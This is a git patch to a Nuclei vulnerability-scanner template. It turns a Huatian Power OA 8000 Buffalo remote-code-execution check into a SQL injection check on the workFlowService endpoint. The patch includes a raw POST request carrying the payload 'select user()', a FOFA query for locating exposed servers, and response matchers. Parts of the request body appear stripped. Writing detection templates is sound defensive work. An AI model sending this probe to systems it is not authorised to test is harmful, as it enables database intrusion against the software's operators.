From 3698f0492d2788025a265822bee207b8c5ba44e4 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 1 Sep 2023 21:00:09 +0530 Subject: [PATCH] Update huatian-oa8000-buffalo-rce.yaml --- .../other/huatian-oa8000-buffalo-rce.yaml | 30 +++++++++++-------- 1 file changed, 17 insertions(+), 13 deletions(-) diff --git a/http/vulnerabilities/other/huatian-oa8000-buffalo-rce.yaml b/http/vulnerabilities/other/huatian-oa8000-buffalo-rce.yaml index 6fb1322c1f..5c18665984 100644 --- a/http/vulnerabilities/other/huatian-oa8000-buffalo-rce.yaml +++ b/http/vulnerabilities/other/huatian-oa8000-buffalo-rce.yaml @@ -1,30 +1,34 @@ -id: huatian-oa8000-buffalo-rce +id: huatian-oa8000-sqli info: - name: Huatian OA8000 Buffalo - Remote Code Execution + name: Huatian Power OA 8000 workFlowService - SQL injection author: SleepingBag945 severity: critical - description: Huatian OA8000 Buffalo found to be vulnerable to Remote Code Execution vulnerability + description: | + There is a SQL injection vulnerability in the workFlowService interface of Huatian Power OA 8000 version, through which an attacker can obtain sensitive database information + reference: + - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E5%8D%8E%E5%A4%A9OA/%E5%8D%8E%E5%A4%A9%E5%8A%A8%E5%8A%9BOA%208000%E7%89%88%20workFlowService%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md metadata: - max-request: 2 + max-request: 1 verified: true fofa-query: app="华天动力-OA8000" - tags: huatian,oa,buffalo,rce + tags: huatian,oa,sqli http: - raw: - | - GET /OAapp/bfapp/buffalo/ HTTP/1.1 + POST /OAapp/bfapp/buffalo/workFlowService HTTP/1.1 Host: {{Hostname}} - - - | - POST /OAapp/bfapp/buffalo/ HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded + + + getDataListForTree + select user() + matchers: - type: dsl dsl: - - status_code_1 == 500 && contains(body_1,'Buffalo worker support POST only!') && contains(body_1,'net.buffalo.service.BuffaloWorker.validate') - - status_code_2 == 500 && contains(body_2,'net.buffalo.service.NoSuchServiceException') && contains(body_2,'net.buffalo.service.BuffaloWorker.processRequest') + - 'status_code == 200' + - 'contains(content_type, "text/xml")' + - 'contains_all(body,"" ,"user()")' condition: and